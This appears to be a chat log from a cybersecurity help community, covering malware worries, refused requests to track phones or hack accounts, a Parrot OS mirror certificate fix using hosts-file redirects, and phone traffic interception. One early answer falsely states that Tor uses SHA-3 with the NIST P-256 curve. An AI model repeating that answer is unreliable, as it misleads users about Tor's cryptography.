Ok so I'm doubting that my pc may contain some malware or virus because it's feeling a little bit unusual while using it and every time I on my pc cmd always pops up 3 times and closes automatically. I run multiple viruses or Malware detection scans like malwarebyte and windows defender but I found nothing what should I do next?

https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
You can try and use autorun sysinternals and see if you find some suspicious apps that are being run.

Hey guy i got a doubt about tor

Does tor uses ecc with sha3 or smthg else

Tor uses Elliptic Curve Cryptography (ECC) in conjunction with the SHA-3 family of hash functions (specifically SHA3-256 and SHA3-512), along with other cryptographic primitives like AES and Diffie-Hellman. The specific ECC implementation uses the NIST P-256 curve.

hey greeting , can anyone tell me where to master web penetration testing with hands on lab for free?

portswigger academy

hello 👋, does anyone know how to use nuitka?

yooo does anyone know why i have this error ? :

zsh: exec format error : hashcat

6gb ram usage at full idle, i def got a crypto miner

any way to make sure my suspicions correct?

check task manager and process explorer for programs with high resource usage

trace that program back to the origins of where it came from

please i need help with tracking a number

#📜・rules, nothing illegal

it's urgent pls can anyone help? she got kidnapped and we need to track her

Damn, that's actually crazy
Police are more helpful than any of us in this situation

People who might DM you are 100% scamming, be careful

Where i'm from(Nigeria) police are the worst pls i need help

That's all you can do I'm afraid

We can't track a number for you

Not because we won't, but because we can't

Somebody said it, thank God 😭

And goblin ofc :>

@shut fern ?

Don't trust someone offering to help.. because they can't

You will only get scammed @candid loom

Oh my god read up

No

jfc

Ohh sorry

hello hellooo

i am here

dang

this chat has been dead DEAD

yeesh

oh wait

im in the wrong channel

Bro ain't gonna take your advice to heart until he experience, lll

Is there any way I can find out who has hacked my Instagram account?

No. Speak with Instagram support.

If you have your account back, secure it, reset the password, update 2FA, and count your lucky stars.

Hi, ftr im super new here. What would you do if you just found a tracker on your car that, hypothetically, my ex boyfriend has been using for months to track me

Contact the authorities.

Thanks, @g0blin, is there anything I can do with the IMEI #?

No, contact the authorities.

That is called stalking.

Yup, will do

Portswigger will be a better choice

This is not a film, we can't triangulate their location from an IMEI number

..or reveal their identity

The sooner you speak to the authorities, the better.

No, I don’t need his info but I’d like to see what info he has gathered from the device. Like when it was activated, for example.

Authorities.

Nobody is going to help tamper with something involved in a potential criminal case

I’m working with authorities. Just wondering if there was any due diligence I could accomplish on my end before handing it over for good

That’s fair

Stay safe, and express any concerns regarding your ex clearly to the authorities.

They should be there to protect you, but they can only do so if aware

They’re not always very helpful. He’s gotten away with this before (as in: the authorities are aware of him and his stalking tendencies. He’s barely gotten a slap on the wrist for much more severe acts of stalking) I’m pretty sure he’s a narc tbh and low key working with the authorities

Sorry to hear that, but that's the only advice to be given tbh

Yep. I was afraid of that. Thanks for your help anyway

No problem, all the best

Goblin ur so good at giving legal advice fr

One more comment.. if the device is still in your possession, do not attempt to tamper with it @dark bough

It could hurt any case brought forth

Thanks.. I try to give good advice, that's all

I understand ur advice very clearly says what it gotta say

@swift island the home page of the project Silver Bullet goes through how you would use it

If you're using the project, you have the homepage of it right?

Which project

The project you asked about

Silver Bullet

This is my first time here can you guide me in accessing stuffs here

No, I don't have time to be a guide - please read #👥・new-member-guide #💕・free-resources

There are plenty of resources out there for you

You asked a question about Silver Bullet, and I answered

Okay thanks

When I say read, like.. scroll up, check the channel subjects

There are resources there

No @edgy bane - this is an ethical server #📜・rules

🫡

But can you suggest a tool I can use for forensic analysis?
It’s for my school project

You asked how to track a phone number.

I'm not going to give you any advice, sorry.

If it's for school, speak to your fellow classmates, or teacher.

Or research it yourself

Okay thank you

p.s. asking people to tell you is not research

🫡

Ye but it will take time

Like half a year

Well, that said they won't tell you who hacked your account

and we literally cannot tell you.. not because we won't, but because we can't @mortal rock

Ye 😭

Is there a way I can recover my account myself

Past the usual password reset and recovery processes?

@frigid glade do not spam the same message across channels, and as I said.. this isn't that kind of server.

Read #📜・rules

Stick around if you can stay by them

Hi just wondering Is there a way to recover an Instagram account through hacking. 1 that has been permanently disabled?

No @nocturne pelican

Contact Instagram support

We cannot help you. Anyone who DMs offering to do so for a cost will just be out there to scam you.

Ok got it

Thanks

Hey there. Am I the only one getting error messages when attempting to update/upgrade Parrot OS?

Is this the certificate error @austere prawn ?

That's right.

This is a known issue with Parrot infrastructure serving up the incorrect certificate. The only solution right now is to force to use the UK mirror IP, or another working region, by adding this to your hosts file.

178.79.175.35 parrotsec.org www.parrotsec.org deb.parrot.sh

The Parrot team have been informed, and will make the required changes as soon as possible, hopefully over the weekend, but possibly not until Monday. Apologies fore the inconvenience.

No idea why people are still seeing this issue tbh

I've raised it again with the team though

That IP points to the EU deb mirror

Some mirrors apparently still have an issue with the cert based upon location

They told me it was resolved

😦

I modified the sources file, none of URLs are functional.

Did you apt update first to fetch the new index?

Yeah, kept Ign messages.

😐 version of Parrot?

6.12.12.

Most recent version is 6.3, but I am surprised the update path is broken like this

That's useful though, thank you

Oh, yeah, it is 6.3 (lorikeet).

Yeah, same version here.

Oh hm.. may be IP has changed for the CDN

One sec

Probably a certificate issue.

Even their website is not browsable.

Could you try with the IP 45.79.231.34 instead in the hosts for deb.parrot.sh?

I tried visiting this URI https://docs.parrotsec.org/docs/mirrors/mirrors-list/, but it displays "Uptime Kuma", with a Page Not Found message.

wtf

Exact reaction.

I'm seeing (UK) deb.parrot.sh, the deb repo resolving to 45.79.231.34 at the moment

Weird...

curl -v https://45.79.231.34/parrot/ --header "Host: deb.parrot.sh"

I got this message: curl: (60) SSL certificate problem: self-signed certificate

The hell..

It seems to be an issue from their servers.

Do you get a cert issue just with curl -v https://deb.parrot.sh without a hosts entry?

Same message.

Their instructions say to pull a keyring from the same hostname...

..which obviously will still error with an invalid cert

True that.

Can you give me the IP it's resolving to for you please?

(without hosts entry obvs)

139.84.238.12

hmm

I dig'd it, points to 139.84.238.12.vultrusercontent.com.

I could try to reach someone from inside, but I have no way to report it -- unless, which is likely, I'm missing something from the system that would lead to contacting their support team.

I've got direct comms to the team, I raised it again last night but I haven't heard back yet

Have you installed the keyring they mention on their blog post?

Could you provide the link to see it?

https://deb.parrot.sh/parrot/pool/main/p/parrot-archive-keyring/parrot-archive-keyring_2024.12_all.deb

but obvs that's going to give you an invalid cert error too no doubt

Source: https://parrotsec.org/blog/2025-01-11-parrot-gpg-keys/

$ sha256sum ./parrot-archive-keyring_2024.12_all.deb
$ 188c74cf726fad499ec416dc6b7dcd9718800aa7178290c10ef7040aea9b5272

I can't browse their URI 😓

Like you said.

Sorry, stupid question and yeah.. but what do you have from date ?

Just trying to figure out wtf is going on

Same as my local time.

Sat May 24 08:43:58 AM +03 2025

...and that URL against the IP you gave loads something about Uptime Kuma

Something definitely fubar

True.

I can pass over the deb file if you want for the keychain update?

But you'd need to point the deb.parrot.sh host entry to the IP I gave above

Remind me how to use the gpg again...

as obviously the IP it's resolving to in your region is not correct

It's just a deb package, so sudo dpkg -i <path to deb>

Oh, gotcha.

..but I know that's a big amount of trust from your side

I don't know if I can drop it here or not

Could not browse it. I'll have to modify the hosts file.

But even with the keyring

it'll still point to the invalid IP

Urgh ok I gotta ping them again, this is fudged

I'll try the IP address you provided, and it doesn't work, will download this file.

With the EU mirror IP it should work after installing that

Just checking hosts files here to make sure I don't have an old IP

Ok, IP I have for the EU mirror is 178.79.175.35

curl still showing as self signed, but apt works off of keychain instead

I actually got Hits from mapping 45.79.231.34 to deb.parrto.sh.

And apt works just fine.

That seems a legit IP also

Must be from the secondary EU or UK mirror

This had to come up again at the weekend

Probably. I'm located in Kuwait, so there must be something with the nearest repo server.

Ok taken notes and passing on to the team again

Yes, it was in that locality the issue last time

they said it was fixed

said

AAAH

Ok well sorry for the inconvenience

😄

Oh, I actually have to thank you for your assistance!

🙏

No inconvenience whatsoever! 🙏

Glad I could help, and I'm gonna go pull some feathers

(gently)

Hey is anyone here knowledgeable on creating backends with python

Is Dell OptiPlex Tiny Desktop (Intel i5 6th Gen) with 16GB RAM and 500GB is good all applications used in cybersecurity ?

is there any way I can like intercept a traffic in my phone and know which websites an app connects to?

like wire shark or burp but for phone, I am "not" root btw

Unless u get nethunter in it I doubt it

it downloads so slow and stops when hits 0.5kb/s, I want to somehow wget it

Have u tried internet speed tester to see

yup, highest is 500kb and lowest is 0.5kb in terms of speed

Try in a diff device

To see the difference

alright

Yessir, you'd need root tho

The app you're targeting might have SSL Pinning as well, there are some scripts laying around to bypass it

Chances are pretty low then :>

Not tried this one tbh.. might give it a look now out of curiosity, but I used to use that mitm tool years ago

https://httptoolkit.com/docs/guides/android/

mitmproxy it was called

But for Https traffic certainly you'll need to install a custom ca, but yeah with pinning you're not going to have much luck

Unsure if you can intercept DNS lookups without root tbh

That seems to work pretty well @chilly merlin

Note, you would be trusting the app itself, and isntalling a CA certificate allowing for pass through of HTTPS traffic

So do due diligence - I just tried it on an old empty device, and it did the job

can someone help explain why a regular nmap scan like this one "nmap -sS -A -T5" shows all 65k ports and a lot of unecessary information but in walkthrough videos the output is only the necessary few services etc? hope someone can explain

ya

what's up

are you scanning the same server as in the video?

no im not actually

also do i need to be connected to a vpn in order to use thm rooms?

Yes

Then no wonder

Different servers will have different vulnerabilities

oh i see

can you link me a video or somewhere where i can find out how to do this?

That's the point of nmap, take an example with houses

Every house has a different amount of doors and windows, nmap knocks on those windows and on all houses different windows will be open to let them in

if you're not doing anything illegal chatgpt is enough

ive heard of pentesting.ai or something i forgot its name

yup that makes a lot of sense, thanks a lot

how to do what

connect to ovpn?

yup i found a video about it tho

thx

Hi

We evolved to a point where we can hack humans how are you supposed to go from the poor class where I'm from to understanding the nature of our current point of evolution then I'm new to this 19 and kinda alone on this someone gotta know

#👥・new-member-guide

XD

Can anybody guide me to guide a full guide for burpsuit

Look up Portswigger Academy

idk how to send images but is this a good thing for a mauruader:

https://amzn.eu/d/9R3TXN1

https://amzn.eu/d/cjde0hE

thats the link when i click the share button and then copy link

i can send the actual amazon names if you want

ESP32-S3 Mini Development Board with Pre-Soldered Header, Based on ESP32-S3FH4R2 Dual-Core Processor, 240MHz Running Frequency, 2.4GHz Wi-Fi & Bluetooth 5, Onboard 4MB Flash Memory/2MB PSRAM

WANGCL 1.8 inch Full Color 128x160 SPI Full Color TFT LCD Display Module ST7735S 3.3V Replace OLED Power Supply for Arduino DIY KIT

Because I wanna make one, but other than arduino stuff i have no expirence (i fried my rfid module and all my leds), and idk if this should work

Hi everyone!
So I'm having the hardest time learning by myself.
I'm using freecodecamp.org and am starting with HTML.
But it's so tedious not having someone to talk to or learn with.

Im 44... Am I just too old?

not necessarily, every human being has their own way of learning things, best suggestion i can give to you is talking to an ai

I understand what you mean.
I'd like someone to challenge me and to ask advice from and practice stuff with

Hello everyone i am new in cybersecurity and looking to dive into it , any road maps ? because i tried picoctf and it actually needs CS experience to solve

So what y’all recommend to start listening to when I’m in vc

Wdym?

https://tryhackme.com/room/introtonetworking

im struggling on the OSINT bit lol. its task 7 on intro to networking. would appreciate the help 🫡